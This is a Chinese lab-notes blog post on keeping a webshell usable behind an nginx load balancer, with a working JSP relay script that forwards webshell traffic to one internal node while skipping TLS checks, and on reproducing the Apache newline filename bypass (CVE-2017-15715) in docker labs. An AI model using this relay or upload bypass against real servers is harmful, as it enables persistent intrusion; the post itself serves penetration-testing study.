负载均衡上传webshell+apache换行解析漏洞

已于 2023-02-09 23:44:12 修改
阅读量501 收藏
点赞数
分类专栏: 笔记 文章标签: 负载均衡 apache 服务器
于 2023-02-09 22:44:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a505964648/article/details/128957745
版权

目录

一、负载均衡反向代理下的webshell上传

1、nginx负载均衡

反向代理方式其中比较流行的方式是用 nginx 来做负载均衡。我们先简单的介绍一下 nginx 支持的几种策略:

名称策略
轮询(默认)按请求顺序逐一分配
weight根据权重分配
ip_hash根据客户端IP分配
least_conn根据连接数分配
fair (第三方)根据响应时间分配
url_hash (第三方)根据响应时间分配

其中 ip_hash、url_hash 这种能固定访问到某个节点的情况,我们也不讨论。

我们以默认的「轮询」方式来做演示。 LBSNode1 和 LBSNode2 均存在位置相同的 Shell: ant.jspNode1 和 Node2 均是 tomcat 8 ,在内网中开放了 8080 端口,我们在外部是没法直接访问到的。 我们只能通过 nginx 这台机器访问。nginx 的配置如下:
在这里插入图片描述

2、负载均衡下webshell上传的四大难点

难点一:需要在每一台节点的相同位置上传相同内容的webshell

我们需要在每一台节点的相同位置都上传相同内容的 WebShell一旦有一台机器上没有,那么在请求轮到这台机器上的时候,就会出现 404 错误,影响使用。是的,这就是你出现一会儿正常,一会儿错误的原因。

难点二:无法预测下一次请求是哪一台机器去执行

我们在执行命令时,无法知道下次的请求交给哪台机器去执行。我们执行 hostname -i查看当前执行机器的 ip 时,可以看到一直在飘,因为我们用的是轮询的方式,还算能确定,一旦涉及了权重等其它指标,就让你好好体验一波什么叫飘乎不定。

难点三:当我们需要上传一些工具时,麻烦来了:

由于 antSword 上传文件时,采用的分片上传方式,把一个文件分成了多次HTTP请求发送给了目标,所以尴尬的事情来了,两台节点上,各一半,而且这一半到底是怎么组合的,取决于 LBS 算法

难点四:由于目标机器不能出外网

由于目标机器不能出外网,想进一步深入,只能使用 reGeorg/HTTPAbs 等 HTTP Tunnel,可在这个场景下,这些 tunnel 脚本全部都失灵了。

3、环境搭建

漏洞复现:
我们假定在真实的业务系统上,存在一个 RCE 漏洞,可以让我们获取 WebShell。

环境搭建(下载地址:https://github.com/AntSwordProject/AntSword-Labs)

在这里插入图片描述

 cd /home/ztx/AntSword-Labs-master/loadbalance/loadbalance-jsp/
 docker-compose up -d

在这里插入图片描述

查看端口号,这里是18080

docker ps -a

在这里插入图片描述
在这里插入图片描述
先到nginx查看一下nginx配置

在这里插入图片描述
用蚁剑尝试连接
在这里插入图片描述
在这里我们发现IP地址发生了漂移
在这里插入图片描述

解决方法

1、关机或者停服

首先在测试阶段,我们可以关闭一台服务器,只保留一台机器,因为健康检查机制的存在,很快其它的节点就会被 nginx 从池子里踢出去,那么妥妥的就能继续了。 但在真实项目中,是不允许的,会严重影响业务。

2、执行前先判断IP;要不要执行;

执行前先判断IP;要不要执行;

MYIP=`ifconfig | grep "inet 172" | awk '{print $2}'`
if [$MYIP == "172.19.0.2" ]; then
 	echo "Node1. I will execute command.\n=======\n"
 	ifconfig
 else
 	echo "Other. Try again."
 fi

(如果这里你的tomcat外网不能访问,记得去Linux主机上的8080端口开放,因为如果你要测试的话需要安装vim和net-tools)这样一来,确实是能够保证执行的命令是在我们想要的机器上了,效果如图;
在这里插入图片描述
蚁剑老是出现一点奇怪的问题,这张图可以不看
在这里插入图片描述

3、在Web 层做一次 HTTP 流量转发

这里一定要保证每一台node上都要有相同的文件(千万别用上传,上传会将文件分片)
在这里插入图片描述
修改 Shell 配置, 将 URL 部分填写为 web.jsp 的地址,其它配置不变
在这里插入图片描述

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="javax.net.ssl.*" %>
<%@ page import="java.io.ByteArrayOutputStream" %>
<%@ page import="java.io.DataInputStream" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.OutputStream" %>
<%@ page import="java.net.HttpURLConnection" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.security.KeyManagementException" %>
<%@ page import="java.security.NoSuchAlgorithmException" %>
<%@ page import="java.security.cert.CertificateException" %>
<%@ page import="java.security.cert.X509Certificate" %>
<%!
  public static void ignoreSsl() throws Exception {
        HostnameVerifier hv = new HostnameVerifier() {
            public boolean verify(String urlHostName, SSLSession session) {
                return true;
            }
        };
        trustAllHttpsCertificates();
        HttpsURLConnection.setDefaultHostnameVerifier(hv);
    }
    private static void trustAllHttpsCertificates() throws Exception {
        TrustManager[] trustAllCerts = new TrustManager[] { new X509TrustManager() {
            public X509Certificate[] getAcceptedIssuers() {
                return null;
            }
            @Override
            public void checkClientTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
                // Not implemented
            }
            @Override
            public void checkServerTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
                // Not implemented
            }
        } };
        try {
            SSLContext sc = SSLContext.getInstance("TLS");
            sc.init(null, trustAllCerts, new java.security.SecureRandom());
            HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
        } catch (KeyManagementException e) {
            e.printStackTrace();
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        }
    }
%>
<%
        String target = "http://172.19.0.2:8080/ant.jsp";
        URL url = new URL(target);
        if ("https".equalsIgnoreCase(url.getProtocol())) {
            ignoreSsl();
        }
        HttpURLConnection conn = (HttpURLConnection)url.openConnection();
        StringBuilder sb = new StringBuilder();
        conn.setRequestMethod(request.getMethod());
        conn.setConnectTimeout(30000);
        conn.setDoOutput(true);
        conn.setDoInput(true);
        conn.setInstanceFollowRedirects(false);
        conn.connect();
        ByteArrayOutputStream baos=new ByteArrayOutputStream();
        OutputStream out2 = conn.getOutputStream();
        DataInputStream in=new DataInputStream(request.getInputStream());
        byte[] buf = new byte[1024];
        int len = 0;
        while ((len = in.read(buf)) != -1) {
            baos.write(buf, 0, len);
        }
        baos.flush();
        baos.writeTo(out2);
        baos.close();
        InputStream inputStream = conn.getInputStream();
        OutputStream out3=response.getOutputStream();
        int len2 = 0;
        while ((len2 = inputStream.read(buf)) != -1) {
            out3.write(buf, 0, len2);
        }
        out3.flush();
        out3.close();
%>

在这里插入图片描述

二、apache换行解析漏洞

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
环境下载链接:https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715
搭建完毕后Apache运行在http://your-ip:8080
漏洞复现
上传一个名为1.php的文件,被拦截:

在这里插入图片描述
在1.php后面插入一个\x0A(只能是一个\x0A),不再拦截:
在这里插入图片描述
访问刚才上传的/1.php/x0a,发现能够成功解析,apache2.4会将他解析为php后缀,但这个文件不是php后缀,说明目标存在解析漏洞。

困惑的Z同学
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全-负载均衡下的webshell连接
01-26
当我们在负载均衡环境下讨论webshell连接时,这意味着我们要探讨的是如何在分布式系统中管理和防范恶意的webshell活动。 Webshell,通常指的是黑客在目标服务器上留下的后门程序,它允许攻击者通过Web接口远程控制...
Apache HTTPD 换行解析漏洞
weixin_60719780的博客
12-07 1329
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。影响版本:Apache 2.4.0~2.4.29 存在一个解析漏洞;在解析PHP时,将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。我们查看一下配置:读取配置文件,前三行的意思是把以 结尾的文件当成 文件执行。问题就在它使用的是 符号匹配的,我们都知道这个符号在正则表达式中的意思是匹配字符串的末尾,是会匹配换行符的,那么漏洞就这样产生了。 进入容器里,打开index.php,发现如果文件后缀名为 php、
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
qq_46081990的博客
05-28 279
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
Apache HTTPD 换行解析漏洞(CVE-2017-15715)复现(vulhub)
qq_51398553的博客
06-18 347
可以看到,在该配置文件中,前三行的意思是将所有以.php为后缀的文件内容当作php文件进行解析,但使用$符对文件进行匹配。定位文件末的方法:在右边找到文件名,然后在左边对应的Hex值的后面有0d0a,0d是回车,0a是换行,在0d的前面插入0a。值得注意的是,当我用Tab键补全的时候,终端换行了,也可以说明文件名确实有换行符的存在。从源代码中可以看出,网站对文件的后缀名进行了过滤,将以php,php3,php4,php5,phtml以及pht为后缀的文件名放入黑名单。,拉取镜像,并查看服务相关信息。
Apache后缀名解析漏洞分析和防御方法
01-20
但是大家可能不知道的是,apache服务器也存在类似的解析漏洞。 我们来做下实验,我在本地搭建好了一个apache+php的测试平台: 两个文件phpinfo.php phpinfo.php.a ,我们来访问下phpinfo.php.a: ...
利用 通达OA 文件上传漏洞上传webshell获取主机权限
最新发布
04-30
帮客户搭建一个演示环境,用于给领导演示,这里我利用了通达OA11.6文件上传漏洞往靶机上上传了一个webshell,然后通过蚁剑去连接webshell从而获取主机权限。 环境要求: 1.靶机环境win10 2.通达OA版本11.6 3.攻击机...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
WEB常见的攻击方式有哪些?如何防御?
茉莉蜜茶~~~
03-26 1624
一、 什么是web攻击 Web攻击(WebAttack)是针对用户上网行为或网站服务器等设备进行攻击的行为 如植入恶意代码,修改网站权限,获取网站用户隐私信息等等 Web应用程序的安全性是任何基于Web业务的重要组成部分 确保Web应用程序安全十分重要,即使是代码中很小的 bug 也有可能导致隐私信息被泄露 站点安全就是为保护站点不受未授权的访问、使用、修改和破坏而采取的行为或实践 我们常见的Web攻击方式有 XSS (Cross Site Scripting) 跨站脚本攻击 CSRF(Cross-
Apache Httpd 常见漏洞解析(全)
黑战士的博客
02-17 2926
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞。在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
Apache两个解析漏洞复现及防御方法
阿道夫的博客
01-28 3341
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
11-4 Apache换行解析漏洞(CVE-2017-15715)
weixin_43263566的博客
11-25 952
Apache換行解析漏洞(CVE-2017-15715)是一种解析漏洞,可以影响httpd 2.4.0至2.4.29版本中的PHP解析。攻击者可以通过在上传的文件名中添加特定的换行符,绕过服务器的安全策略,使其被解析成PHP文件而不是普通文件。未正确配置的服务器未对文件名进行适当验证的服务器使用正则表达式并启用Multiline属性的服务器攻击者可以将1.php\x0A作为文件名上传服务器上,这个文件名看起来像是一个普通的非PHP文件,但是由于其中的特定字符,服务器会将其解析为PHP文件。
负载均衡反向代理下的webshell上传+apache漏洞
weixin_53284312的博客
02-09 953
负载均衡下的webshell
安全中级3:apache中间件漏洞
weixin_62870380的博客
06-06 1533
运维人员在配置http的默认配置文件的时候,开启了AddHandler application/x-httpd-php .php,虽然限制住了php文件,但是我们可以添加后缀.jpg,只要我们的后缀含有一个php文件就可以解析,没必要是最后一个后缀。我们上传php文件的时候,我们的服务器拒绝上传,但是 apache在配置文件的http.conf的时候开启了SSI(服务器端包含)服务,允许我们的html页面上传shtml文件,而我们的cgi是前端的一个脚本,我们利用他的语法执行任意的命令。
Apache换行解析漏洞
hovcfuti的博客
10-11 114
如果设置了 RegExp 对象的 Multiline 属性,则 $ 也匹配 '\n' 或 '\r'。如果设置了 RegExp 对象的 Multiline 属性,则 $ 也匹配 '\n' 或 '\r'。$符匹配‘/n’或者是‘/r’,所以在我们上传文件后缀名为.php/n时,apache将自动将该文件解析为php文件。对数据包就行修改,在1.php后面添加换行,因为提交方式是POST方式,所以要对换行符进行两次url编码。在靶场环境中访问我们的上传文件,注意访问的文件名为1.php%0A。
nginx反向代理+负载均衡上传webshell重难点+apache漏洞
Y1NZE1的博客
02-08 143
nginx反向代理+负载均衡上传webshell重难点+apache漏洞
nginx反向代理+负载均衡/上传webshell+apache漏洞
weixin_57385269的博客
02-16 189
搭建完毕后Apache运行在http://your-ip:8080。要保证每一台node上都要有相同的文件。
Apache 中间件漏洞(换行解析)详解
xinyue9966的博客
02-17 3767
介绍 Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中。 简而言之,Apache服务器不仅简单好用,还能支持HTML、PHP、Perl、Python等基础语言。 目录介绍 bin-------存放常用的命令工具,例如httpd cgi-bin---存放Linux下常用的命令,例如xxx.sh co
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值